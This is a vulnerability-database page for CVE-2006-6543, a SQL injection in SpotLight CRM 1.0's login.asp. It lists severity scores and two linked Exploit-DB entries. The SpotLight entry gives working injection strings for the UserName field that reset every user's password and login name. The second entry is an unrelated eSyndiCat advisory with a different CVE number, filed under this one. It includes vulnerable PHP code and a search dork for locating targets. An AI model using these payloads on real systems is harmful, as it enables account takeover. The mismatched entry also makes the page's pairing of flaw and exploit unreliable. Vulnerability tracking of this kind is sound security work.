CVE-2006-6543
Published: 2006-12-14
Priority: P3 41 · Severity: high · CVSS 2.0: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed
EPSS: 1.02% (59.1th percentile)
Multiple SQL injection vulnerabilities in login.asp in AppIntellect SpotLight CRM 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) login (UserName) and possibly (2) password parameter. NOTE: some of these details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| appintellect | spotlight_crm | — | — |
No detection rules found.
Exploit-DB
eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
exploitdb · 2007-12-25 · CVE-2007-6543
---
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php (lines 30-32):

```php
/** gets information about current category **/
$category =& $gDirDb->getCategoryById($_GET['id']);   // $_GET['id'] passed through unfiltered
$gDirSmarty->assign_by_ref('category', $category);
```

[-] getCategoryById function defined in /classes/Dir.php (lines 323-330):

```php
function getCategoryById($aCategory)
{
    // $aCategory is interpolated straight into the query string
    $sql  = "SELECT * FROM `{$this->mPrefix}categories` ";
    $sql .= "WHERE `id` = '{$aCategory}'";

    return $this->mDb->getRow($sql);
}
```
Exploit-DB
SpotLight CRM 1.0 - 'login.asp' SQL Injection
exploitdb · 2006-12-09 · CVE-2006-6543
---
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
[[SQL]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# I'm not Hacker!
# milw0rm.com [2006-12-09]
No writeups or analysis indexed.
Timeline: 2006-12-14 · Published